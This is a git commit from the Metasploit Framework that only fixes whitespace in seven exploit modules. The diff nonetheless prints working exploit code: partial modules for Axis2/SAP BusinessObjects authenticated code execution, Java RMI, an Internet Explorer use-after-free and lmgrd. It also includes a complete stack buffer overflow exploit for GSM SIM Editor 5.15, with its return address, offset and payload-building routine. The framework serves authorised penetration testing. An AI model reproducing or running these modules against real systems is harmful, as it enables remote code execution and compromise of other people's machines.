Whitespace, thanks msftidy.rb!

unstable
James Lee 2012-05-31 18:18:27 -06:00
parent 0def186824
commit 4681ed1c1e
7 changed files with 122 additions and 122 deletions

View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
return [nil, nil] if not (res and res.headers['Set-Cookie'])
# Get the session ID from the cookie
m = res.headers['Set-Cookie'].match(/(DOLSESSID_.+);/)
id = (m.nil?) ? nil : m[1]

View File

@ -8,13 +8,13 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)',
'Description' => %q{
@ -23,18 +23,18 @@ class Metasploit3 < Msf::Exploit::Remote
},
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
'Platform' => 'java'
},
],
#
# Platform specific targets only
@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
metasploit.PayloadServlet
</parameter>
</service>
}
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
end
end
boundary = rand_text_alphanumeric(6)
@ -134,27 +134,27 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end
print_status("Polling to see if the service is ready")
@ -241,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}#{rpath}/(rest|services) Unable to authenticate (#{res.code} #{res.message})")
end
end
end
def cleanup_instructions(rpath, name)
print_line("")
@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_line("")
end
def exploit
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
rpath = datastore['PATH']
@ -345,4 +345,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end
end

View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
# RMI protocol specification
[ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
# Placeholder reference for matching
[ 'MSF', 'java_rmi_server']
[ 'MSF', 'java_rmi_server']
],
'DisclosureDate' => 'Oct 15 2011',
'Platform' => ['java', 'win', 'osx', 'linux', 'solaris'],
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0
))
register_options( [ Opt::RPORT(1099) ], self.class)
register_autofilter_ports([ 1098, 1099 ])
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
end
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Not exploitable: the RMI class loader is disabled")
return
end
print_good("Target #{rhost}:#{rport} may be exploitable...")
# Wait for the request to be handled

View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "MS10-002 Internet Explorer Object Memory Use-After-Free",
'Description' => %q{
This module exploits a vulnerability found in Internet Explorer's
mshtml component. Due to the way IE handles objects in memory, it is
mshtml component. Due to the way IE handles objects in memory, it is
possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext
to be used even after it gets freed, therefore allowing remote code
execution under the context of the user.

View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def get_payload(hunter)
[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
enc = framework.encoders.create(name)
if name =~ /unicode/

View File

@ -1,75 +1,75 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
overflow occurs which allows an attacker to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ruben Alejandro',
'chap0 <contact.chap0[at]gmail.com>',
'Lincoln <lincoln[at]corelan.be>'
],
'References' =>
[
[ 'EDB', '14258' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
},
'Targets' =>
[
[ 'Windows XP SP3',
{
'Ret' => 0x00405201, # call esp - SIMEditor.exe
'Offset' => 810
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 07 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
], self.class)
end
def exploit
buffer = rand_text_numeric(target['Offset'])
buffer << [target.ret].pack('V').unpack("H*")[0]
buffer << make_nops(30).unpack("H*")[0]
buffer << payload.encoded.unpack("H*")[0]
file_create(buffer)
end
end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'GSM SIM Editor 5.15 Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.
When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer
overflow occurs which allows an attacker to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ruben Alejandro',
'chap0 <contact.chap0[at]gmail.com>',
'Lincoln <lincoln[at]corelan.be>'
],
'References' =>
[
[ 'EDB', '14258' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment #add esp, -3500
},
'Targets' =>
[
[ 'Windows XP SP3',
{
'Ret' => 0x00405201, # call esp - SIMEditor.exe
'Offset' => 810
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 07 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.sms']),
], self.class)
end
def exploit
buffer = rand_text_numeric(target['Offset'])
buffer << [target.ret].pack('V').unpack("H*")[0]
buffer << make_nops(30).unpack("H*")[0]
buffer << payload.encoded.unpack("H*")[0]
file_create(buffer)
end
end

View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '52718' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-052/' ],
[ 'URL', 'http://aluigi.altervista.org/adv/lmgrd_1-adv.txt' ],
[ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
[ 'URL', 'http://www.flexerasoftware.com/pl/13057.htm' ] # Vendor advisory
],
'Privileged' => true,
'DefaultOptions' =>